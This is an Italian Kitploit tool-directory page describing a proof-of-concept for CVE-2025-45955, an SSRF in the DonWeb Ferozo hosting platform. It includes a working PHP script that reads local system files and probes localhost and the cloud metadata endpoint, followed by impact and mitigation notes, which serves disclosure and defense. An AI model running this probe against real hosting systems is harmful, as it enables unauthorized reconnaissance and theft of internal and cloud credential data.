Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-45955 — Exploit proof-of-concept per CVE-2025-45955 che dimostra Server-Side Request Forgery (SSRF) nella piattaforma di hosting DonWeb Ferozo, consentendo la mappatura dell'infrastruttura interna e l'enumerazione dei metadati cloud. | Kitploit
Strumenti/GitHubGitHub/surendrapuppala7/cve-2025-45955
RicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebSicurezza Cloud
GitHubsurendrapuppala7/cve-2025-45955

CVE-2025-45955

Exploit proof-of-concept per CVE-2025-45955 che dimostra Server-Side Request Forgery (SSRF) nella piattaforma di hosting DonWeb Ferozo, consentendo la mappatura dell'infrastruttura interna e l'enumerazione dei metadati cloud.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
138 mesi faNon ancora revisionato

CVE-2025-45955

Server-Side Request Forgery in DonWeb Ferozo (CVE-2025-45955)

Descrizione

Un attaccante può sfruttare questa vulnerabilità caricando ed eseguendo un file PHP appositamente predisposto sulla piattaforma di hosting Ferozo. Una volta accessibile, il file lancia una serie di tentativi SSRF verso servizi interni (come 127.0.0.1, 169.254.169.254 o endpoint del service mesh), file locali (ad esempio file:///etc/passwd) ed endpoint noti di metadata cloud. Lo script raccoglie risposte o messaggi di errore, consentendo all'attaccante di mappare l'infrastruttura interna, enumerare i servizi accessibili e raccogliere informazioni sensibili per ulteriori attacchi.

Prova di Concetto (PoC)

Il codice seguente dimostra la vulnerabilità:

root@kitploit:~
<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>

Componente Affetto

  • Piattaforma di Hosting Ferozo (DonWeb)
  • Ambienti basati su PHP che consentono l'esecuzione di file PHP caricati o controllati dall'utente

Impatto

  • Divulgazione di informazioni: Perdita di IP interni, contenuti di file, endpoint di metadata cloud
  • Ricognizione dell'infrastruttura: Consente l'enumerazione di porte e servizi (Docker, Kubelet, ecc.)
  • Potenziale sfruttamento cloud: Sonda endpoint di metadata noti come AWS, GCP e Alibaba
  • Opportunità di concatenamento: Può essere abbinata ad altre vulnerabilità locali per RCE o spostamento laterale

Mitigazione

  • Limitare le funzioni di inclusione di file e accesso URL (file_get_contents, fopen, ecc.)
  • Bloccare l'accesso agli intervalli IP interni (127.0.0.0/8, 169.254.169.254, ecc.) tramite regole firewall in uscita
  • Verificare e sanificare gli input utente che potrebbero influenzare percorsi file o URL

CVE ID

CVE-2025-45955


Scopritore

Segnalato da [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]*

Scarica lo strumento